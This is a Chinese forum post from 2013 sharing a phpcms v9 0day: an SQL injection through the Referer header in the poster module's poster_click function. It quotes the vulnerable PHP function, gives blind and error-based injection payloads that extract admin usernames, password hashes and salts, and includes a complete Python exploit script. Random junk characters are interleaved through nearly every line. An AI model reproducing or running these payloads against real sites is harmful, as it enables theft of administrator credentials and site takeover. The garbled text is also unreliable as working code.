有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:. h$ p) q/ n) V0 N5 B
; t0 Z3 E3 I$ V1 V) ]' w8 {% o& g问题函数\phpcms\modules\poster\index.php
Y/ }# _1 ]/ X4 k5 e$ l. @; E0 N, Z
public function poster_click() {
6 O. {/ A0 L8 i4 I4 M* Y$id = isset($_GET['id']) ? intval($_GET['id']) : 0;& d6 ]" K- K0 @& z& z
$r = $this->db->get_one(array('id'=>$id));8 O/ o& I* k; u1 ], o' C7 D# F+ R
if (!is_array($r) && empty($r)) return false;3 N8 k8 p; v; r' a- K
$ip_area = pc_base::load_sys_class('ip_area');: y9 B/ D* r3 Q
$ip = ip();
! F* T1 s- I% }9 h$area = $ip_area->get($ip);! c3 r7 ?" q" e2 `4 B( w
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
. ?% [1 V: e9 Zif($id) {1 l2 b! |& M3 ~7 E e) G
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
' n$ `& L0 H. b7 L& x$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
% j- B! c' @5 e: B0 E& O# x}2 I2 }; g Z% c5 e8 p& Q
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));1 e$ k$ @& d3 f9 m- g* j$ B
$setting = string2array($r['setting']);
3 d. ?% I7 ]: [$ ^5 v2 Lif (count($setting)==1) {
4 A( v4 L. Q& c' |8 N+ c1 N% t' d$url = $setting['1']['linkurl'];
) w. [6 N( |, [# ^1 N} else {' ]7 P1 D' @ n: l- e1 z: P+ f
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
1 M8 O( }0 L( L6 @, G}
. X( y/ t2 v8 g$ b+ i( Wheader('Location: '.$url);
9 z- x. J( X$ m3 J}7 p/ E. @# x0 _" @. y+ J
. n5 \3 n }& {* v) @( r
" Y! o# c1 {( ?7 g6 e+ Y! e, q
3 W1 }$ x% O+ n @利用方式:
* p0 o! \& f R9 q% o7 Z% d- i, F
1、可以采用盲注入的手法:
3 i. C3 t5 G3 v( U, W* V
0 ?8 K2 n" \0 qreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
$ r8 s8 B9 a1 S4 ]( A" Z$ d% k& u7 ~9 |1 E. J. x: B( a
通过返回页面,正常与否一个个猜解密码字段。
a" M7 O) s. b( v( s5 z# ^$ N. m/ _4 Z" \0 t
2、代码是花开写的,随手附上了:
& u: @7 f2 e1 G3 u: ?
X& M: m+ O3 F/ n4 T. @9 T1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
6 ?9 q# K- g8 V5 p% |3 W3 \9 Y2 \8 L C; a
此方法是爆错注入手法,原理自查。
. N4 ]/ i6 R- i
' ?$ Y; E+ x2 g- U- A4 V
Z- i4 n4 ^6 K2 e
8 N/ k+ I8 T0 u% P利用程序:
4 q' t+ B) p9 {/ M+ }/ u v9 v Q4 Y, e2 t& h$ k, V
#!/usr/bin/env python
h: k' Q$ l& J, _! ?6 qimport httplib,sys,re
U2 V. L) B& @( D
/ g& @5 o2 }. V' P" ?def attack():5 F$ T# W: d! I( O; j% G
print “Code by Pax.Mac Team conqu3r!”
8 {3 u: z9 g1 r4 y( e5 U& oprint “Welcome to our zone!!!”$ ~" }/ P0 C+ t R& ^# h
url=sys.argv[1]
; e) n, m. S" ~3 f% y: r; x- wpaths=sys.argv[2]
# z+ y: f0 ]& y% i mconn = httplib.HTTPConnection(url)+ d3 l4 }, U3 A. w
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
( |! X; \5 A: r' s; d" M“Accept”: “text/plain”,- \/ V$ s1 k. G: J* S, c
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
; Z# e. J1 }4 M6 q' T" Tconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers): m7 `- S: a2 E- ?: ?
r1 = conn.getresponse()/ f& K2 Y9 A$ N5 `) U! N( C
datas=r1.read()
; E; h) d+ |* h) G3 ]* B+ Gdatas=re.findall(r”Duplicate entry \’\w+’”, datas), a) v" s7 N1 u: z+ |
print datas[0]
$ g0 B( A( F# K1 P! v, Uconn.close() R* b: g9 w4 c7 \$ h
if __name__==”__main__”:* \% w0 _/ A2 E. w9 W# Q
if len(sys.argv)<3:9 v$ B0 _7 G" d
print “Code by Pax.Mac Team conqu3r”/ m3 m, k, q, g1 P
print “Usgae:”9 M+ Y h7 c* j; e3 u& O
print “ phpcmsattack.py www.paxmac.org /”7 G" E- o% l# ~
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
o3 }9 Y9 S8 W8 t( `4 fsys.exit(1); d. N1 J8 x9 \( H" C/ r; t2 r: X
attack()+ L& U2 [5 \6 |: F* W3 D) D3 J
6 M% r; s$ N. f) [
|
发表于 2013-1-11 21:01:00
收藏
支持
反对